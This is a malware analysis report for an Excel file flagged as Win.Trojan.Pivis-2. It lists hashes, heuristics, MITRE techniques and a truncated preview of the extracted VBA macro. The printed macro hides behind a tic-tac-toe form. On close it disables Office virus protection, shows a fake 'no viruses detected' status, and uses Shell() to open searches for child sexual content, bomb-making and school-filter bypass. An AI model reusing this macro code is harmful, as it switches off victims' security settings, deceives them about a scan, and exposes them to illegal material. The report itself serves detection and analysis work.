Win.Trojan.Pivis-2 Office (OOXML) malware analysis — malicious · 06a0a50873f5f8d2

MALICIOUS

Office (OOXML)

42.3 KB Created: 2021-06-30 07:54:03 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-07-07

MD5: 20e945803e6dc87675860062079e5288 SHA-1: 25da70364bf1acfbf22775a8b45ab01177e8ec80 SHA-256: 06a0a50873f5f8d2153e5c13c5a06bcf0b45607fc9029ca06bfe5ee99919d340

260 Risk Score

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is an Office document containing VBA macros that use the Shell() function, a critical indicator of malicious activity. The document body explicitly instructs the user to 'Enable macros and disable antivirus', which, combined with the VBA Shell() call, strongly suggests the macro is designed to download and execute a secondary payload. The ClamAV detection of 'Win.Trojan.Pivis-2' further supports this assessment.

Heuristics 5

ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Pivis-2
VBA project inside OOXML medium 1 related finding OOXML_VBA

Document contains a VBA project — VBA macros present
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Security software disable instruction high SE_SECURITY_BYPASS

Document instructs the user to disable antivirus or security software — unusual for ordinary documents and high-risk in an unsolicited file
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	6314 bytes
SHA-256: `e23779c073ca93680dfbaf6f4b8a190ad82dff9484ebea170de9de7971b3caf0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "jugenmofo88" Attribute VB_Base = "0{336CE18E-5901-4331-B2D1-4419E3718E22}{A8F79920-6D2F-480A-8A11-94A7FCC22B7B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub b1_Click() If b1.Caption = "" Then b1.Caption = "O" ElseIf b1.Caption = "O" Then b1.Caption = "X" Else: b1.Caption = "O" End If End Sub Private Sub b10_Click() b1.Caption = "" b2.Caption = "" b3.Caption = "" b4.Caption = "" b5.Caption = "" b6.Caption = "" b7.Caption = "" b8.Caption = "" b9.Caption = "" End Sub Private Sub b2_Click() If b2.Caption = "" Then b2.Caption = "O" ElseIf b2.Caption = "O" Then b2.Caption = "X" Else: b2.Caption = "O" End If End Sub Private Sub b3_Click() If b3.Caption = "" Then b3.Caption = "O" ElseIf b3.Caption = "O" Then b3.Caption = "X" Else: b3.Caption = "O" End If End Sub Private Sub b4_Click() If b4.Caption = "" Then b4.Caption = "O" ElseIf b4.Caption = "O" Then b4.Caption = "X" Else: b4.Caption = "O" End If End Sub Private Sub b5_Click() If b5.Caption = "" Then b5.Caption = "O" ElseIf b5.Caption = "O" Then b5.Caption = "X" Else: b5.Caption = "O" End If End Sub Private Sub b6_Click() If b6.Caption = "" Then b6.Caption = "O" ElseIf b6.Caption = "O" Then b6.Caption = "X" Else: b6.Caption = "O" End If End Sub Private Sub b7_Click() If b7.Caption = "" Then b7.Caption = "O" ElseIf b7.Caption = "O" Then b7.Caption = "X" Else: b7.Caption = "O" End If End Sub Private Sub b8_Click() If b8.Caption = "" Then b8.Caption = "O" ElseIf b8.Caption = "O" Then b8.Caption = "X" Else: b8.Caption = "O" End If End Sub Private Sub b9_Click() If b9.Caption = "" Then b9.Caption = "O" ElseIf b9.Caption = "O" Then b9.Caption = "X" Else: b9.Caption = "O" End If End Sub Private Sub UserForm_Initialize() tolong.Visible = False End Sub Private Sub UserForm_Terminate() do_the_stuff End Sub Attribute VB_Name = "jaknpoi" ' ">=D3rqw)#=4J`K(c86$q`xvdGxwy=3(ha+$qa>t^!Kg9!Jt9 ' ")"83v'94b"85v9A4JqA4ac?5rqK3a`=xv+`3>ddxwy93?}G3)594>&8+wyG4wq=48ll ' %(uD5auJ+$qF3b59+vud4JqA4Jq:3byA3>4F{:q((rqw%Jtl Sub start() jugenmofo88.Show End Sub ' $vux&99$vtF{:cl Sub do_the_stuff() Dim bruh, jakom, jakom2 Options.ConfirmConversions = False Options.VirusProtection = False Options.SaveNormalPrompt = False Application.Caption = "Office sucks. Use LibreOffice instead" Application.StatusBar = True Application.StatusBar = "No viruses were detected during the scan." If Month() = 6 & Day() = 4 Then Application.StatusBar = "FREE TIBET THE TIANANMEN SQUARE PROTESTS OF 1989 THE TIANANMEN SQUARE MASSACRE THE ANTI-RIGHTIST STRUGGLE THE GREAT LEAP FORWARD THE GREAT PROLETARIAN CULTURAL REVOLUTION HUMAN RIGHTS DEMOCRATIZATION FREEDOM" End If bruh = Shell("iexplore google.com/search?q=loli+hentai", 1) bruh = Shell("iexplore google.com/search?q=how+to+make+a+bomb", 1) bruh = Shell("iexplore google.com/search?q=porn", 1) bruh = Shell("iexplore google.com/search?q=school+filter+bypass", 1) bru ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	40448 bytes
SHA-256: `e84a8d961deed09ae2500b8cd4da2621b0931c840ee9d80741904fb82568d30d`
Detection ClamAV: Win.Trojan.Pivis-2 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.